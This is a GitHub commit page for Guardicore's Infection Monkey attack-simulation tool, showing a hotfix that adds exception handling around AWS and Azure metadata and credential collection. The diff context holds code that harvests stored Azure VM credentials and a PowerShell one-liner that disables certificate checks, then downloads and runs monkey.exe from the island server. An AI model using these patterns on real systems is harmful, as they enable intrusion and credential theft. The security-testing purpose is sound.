Skip to content

Commit

Permalink
Merge pull request guardicore#465 from guardicore/463/hotfix/exceptio…
Browse files Browse the repository at this point in the history
…n-on-aws-network-error

463/hotfix/exception on aws network error -> master
  • Loading branch information
ShayNehmad authored Oct 13, 2019
2 parents b6b58b3 + 177f902 commit 5540007
Show file tree
Hide file tree
Showing 6 changed files with 61 additions and 29 deletions.
6 changes: 3 additions & 3 deletions monkey/common/cloud/aws_instance.py
Original file line number Diff line number Diff line change
Expand Up @@ -29,14 +29,14 @@ def __init__(self):
AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/instance-id', timeout=2).read()
self.region = self._parse_region(
urllib2.urlopen(AWS_LATEST_METADATA_URI_PREFIX + 'meta-data/placement/availability-zone').read())
except urllib2.URLError as e:
logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e.message))
except (urllib2.URLError, IOError) as e:
logger.debug("Failed init of AwsInstance while getting metadata: {}".format(e.message), exc_info=True)

try:
self.account_id = self._extract_account_id(
urllib2.urlopen(
AWS_LATEST_METADATA_URI_PREFIX + 'dynamic/instance-identity/document', timeout=2).read())
except urllib2.URLError as e:
except (urllib2.URLError, IOError) as e:
logger.debug("Failed init of AwsInstance while getting dynamic instance data: {}".format(e.message))

@staticmethod
Expand Down
54 changes: 32 additions & 22 deletions monkey/infection_monkey/system_info/__init__.py
Original file line number Diff line number Diff line change
Expand Up @@ -113,7 +113,7 @@ def get_network_info(self):
:return: None. Updates class information
"""
LOG.debug("Reading subnets")
self.info['network_info'] =\
self.info['network_info'] = \
{
'networks': get_host_subnets(),
'netstat': NetstatCollector.get_netstat_info()
Expand All @@ -122,28 +122,38 @@ def get_network_info(self):
def get_azure_info(self):
"""
Adds credentials possibly stolen from an Azure VM instance (if we're on one)
Updates the credentials structure, creating it if neccesary (compat with mimikatz)
Updates the credentials structure, creating it if necessary (compat with mimikatz)
:return: None. Updates class information
"""
from infection_monkey.config import WormConfiguration
if not WormConfiguration.extract_azure_creds:
return
LOG.debug("Harvesting creds if on an Azure machine")
azure_collector = AzureCollector()
if 'credentials' not in self.info:
self.info["credentials"] = {}
azure_creds = azure_collector.extract_stored_credentials()
for cred in azure_creds:
username = cred[0]
password = cred[1]
if username not in self.info["credentials"]:
self.info["credentials"][username] = {}
# we might be losing passwords in case of multiple reset attempts on same username
# or in case another collector already filled in a password for this user
self.info["credentials"][username]['password'] = password
if len(azure_creds) != 0:
self.info["Azure"] = {}
self.info["Azure"]['usernames'] = [cred[0] for cred in azure_creds]
# noinspection PyBroadException
try:
from infection_monkey.config import WormConfiguration
if not WormConfiguration.extract_azure_creds:
return
LOG.debug("Harvesting creds if on an Azure machine")
azure_collector = AzureCollector()
if 'credentials' not in self.info:
self.info["credentials"] = {}
azure_creds = azure_collector.extract_stored_credentials()
for cred in azure_creds:
username = cred[0]
password = cred[1]
if username not in self.info["credentials"]:
self.info["credentials"][username] = {}
# we might be losing passwords in case of multiple reset attempts on same username
# or in case another collector already filled in a password for this user
self.info["credentials"][username]['password'] = password
if len(azure_creds) != 0:
self.info["Azure"] = {}
self.info["Azure"]['usernames'] = [cred[0] for cred in azure_creds]
except Exception:
# If we failed to collect azure info, no reason to fail all the collection. Log and continue.
LOG.error("Failed collecting Azure info.", exc_info=True)

def get_aws_info(self):
self.info['aws'] = AwsCollector().get_aws_info()
# noinspection PyBroadException
try:
self.info['aws'] = AwsCollector().get_aws_info()
except Exception:
# If we failed to collect aws info, no reason to fail all the collection. Log and continue.
LOG.error("Failed collecting AWS info.", exc_info=True)
1 change: 1 addition & 0 deletions monkey/monkey_island/cc/environment/aws.py
Original file line number Diff line number Diff line change
Expand Up @@ -9,6 +9,7 @@
class AwsEnvironment(Environment):
def __init__(self):
super(AwsEnvironment, self).__init__()
# Not suppressing error here on purpose. This is critical if we're on AWS env.
self.aws_info = AwsInstance()
self._instance_id = self._get_instance_id()
self.region = self._get_region()
Expand Down
14 changes: 13 additions & 1 deletion monkey/monkey_island/cc/services/remote_run_aws.py
Original file line number Diff line number Diff line change
@@ -1,3 +1,5 @@
import logging

from monkey_island.cc.services.config import ConfigService
from common.cloud.aws_instance import AwsInstance
from common.cloud.aws_service import AwsService
Expand All @@ -7,6 +9,8 @@

__author__ = "itay.mizeretz"

logger = logging.getLogger(__name__)


class RemoteRunAwsService:
aws_instance = None
Expand All @@ -23,7 +27,15 @@ def init():
:return: None
"""
if RemoteRunAwsService.aws_instance is None:
RemoteRunAwsService.try_init_aws_instance()

@staticmethod
def try_init_aws_instance():
# noinspection PyBroadException
try:
RemoteRunAwsService.aws_instance = AwsInstance()
except Exception:
logger.error("Failed init aws instance. Exception info: ", exc_info=True)

@staticmethod
def run_aws_monkeys(instances, island_ip):
Expand Down Expand Up @@ -119,7 +131,7 @@ def _get_run_monkey_cmd_windows_line(bit_text, island_ip):
return r"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {" \
r"$true}; (New-Object System.Net.WebClient).DownloadFile('https://" + island_ip + \
r":5000/api/monkey/download/monkey-windows-" + bit_text + r".exe','.\\monkey.exe'); " \
r";Start-Process -FilePath '.\\monkey.exe' -ArgumentList 'm0nk3y -s " + island_ip + r":5000'; "
r";Start-Process -FilePath '.\\monkey.exe' -ArgumentList 'm0nk3y -s " + island_ip + r":5000'; "

@staticmethod
def _get_run_monkey_cmd_line(is_linux, is_64bit, island_ip):
Expand Down
2 changes: 2 additions & 0 deletions monkey/monkey_island/cc/services/reporting/aws_exporter.py
Original file line number Diff line number Diff line change
Expand Up @@ -24,6 +24,7 @@ def handle_report(report_json):
logger.info('No issues were found by the monkey, no need to send anything')
return True

# Not suppressing error here on purpose.
current_aws_region = AwsInstance().get_region()

for machine in issues_list:
Expand Down Expand Up @@ -70,6 +71,7 @@ def _prepare_finding(issue, region):
configured_product_arn = load_server_configuration_from_file()['aws'].get('sec_hub_product_arn', '')
product_arn = 'arn:aws:securityhub:{region}:{arn}'.format(region=region, arn=configured_product_arn)
instance_arn = 'arn:aws:ec2:' + str(region) + ':instance:{instance_id}'
# Not suppressing error here on purpose.
account_id = AwsInstance().get_account_id()
logger.debug("aws account id acquired: {}".format(account_id))

Expand Down
13 changes: 10 additions & 3 deletions monkey/monkey_island/cc/services/reporting/exporter_init.py
Original file line number Diff line number Diff line change
Expand Up @@ -9,11 +9,18 @@

def populate_exporter_list():
manager = ReportExporterManager()
RemoteRunAwsService.init()
if RemoteRunAwsService.is_running_on_aws() and ('aws' == env.get_deployment()):
manager.add_exporter_to_list(AWSExporter)
try_add_aws_exporter_to_manager(manager)

if len(manager.get_exporters_list()) != 0:
logger.debug(
"Populated exporters list with the following exporters: {0}".format(str(manager.get_exporters_list())))


def try_add_aws_exporter_to_manager(manager):
# noinspection PyBroadException
try:
RemoteRunAwsService.init()
if RemoteRunAwsService.is_running_on_aws() and ('aws' == env.get_deployment()):
manager.add_exporter_to_list(AWSExporter)
except Exception:
logger.error("Failed adding aws exporter to manager. Exception info:", exc_info=True)

0 comments on commit 5540007

Please sign in to comment.